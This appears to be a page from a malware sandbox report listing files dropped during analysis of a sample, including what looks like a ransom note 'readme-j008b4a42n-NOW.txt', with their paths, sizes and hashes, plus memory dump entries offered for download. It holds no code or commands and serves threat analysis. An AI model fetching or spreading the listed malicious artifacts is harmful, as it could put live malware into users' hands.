C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
f23aee25dd724c21b6bad5441effbb68

SHA1
21a904ea6b13a23f6dcaa307c4065653921bc7c4

SHA256
1b7a4bcc799693aa07c2fa8721389143c0ae38ff0ace0145df8014640c155262

SHA512
b7ab82628e6b3a024243602d9f26afa32873edf29fc52b81805dc9845bbe3676263737db862e99b12e950d5b7421ae37c913689a26bc961bdb16e8ac180a9b5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar95DE.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\readme-j008b4a42n-NOW.txt

Filesize
5KB

MD5
8155aa930219e29cf549609fdc56776c

SHA1
b175ced44bf6cd776ba2d47af6601d1f5b922cf5

SHA256
ebca0b349a7da08111b811a73a0514f1636d4d8deac30b557a0a46067162b162

SHA512
6ed4e7d76c9de2a73222fa5ce9eeb7320441cfed825b69e724646c225017bfb9fefce709b66bfdfdbd8804eb17c2b0cd085e8f66fc96ef0813f7e80737154461

Download Submit
C:\Windows\System32\catroot2\dberr.txt

Filesize
194KB

MD5
f2bf84d2147a2f0c15b6bedabb7e0cf7

SHA1
e754895deab735842dc19d5c7e8f4dd403ead05b

SHA256
45ed7726792ba4a3b0246ee4e37d29053ead641f9e4bc384234b612f66a91752

SHA512
ca6ba2f511257dec7d924ff4fe9684748f0c857e4cd78c0f04edd97c88e2fceb071617ca5149ce493da3259dd1a57d5908af13c1cb73a1687734e1afbe8b7176

Download Submit
memory/2736-7-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp

Filesize
9.6MB

Download
memory/2736-10-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp

Filesize
9.6MB

Download
memory/2736-9-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp

Filesize
9.6MB

Download
memory/2736-8-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp

Filesize
9.6MB

Download
memory/2736-4-0x000007FEF5E5E000-0x000007FEF5E5F000-memory.dmp

Filesize
4KB

Download
memory/2736-6-0x0000000001F50000-0x0000000001F58000-memory.dmp

Filesize
32KB

Download
memory/2736-5-0x000000001B6A0000-0x000000001B982000-memory.dmp

Filesize
2.9MB

Download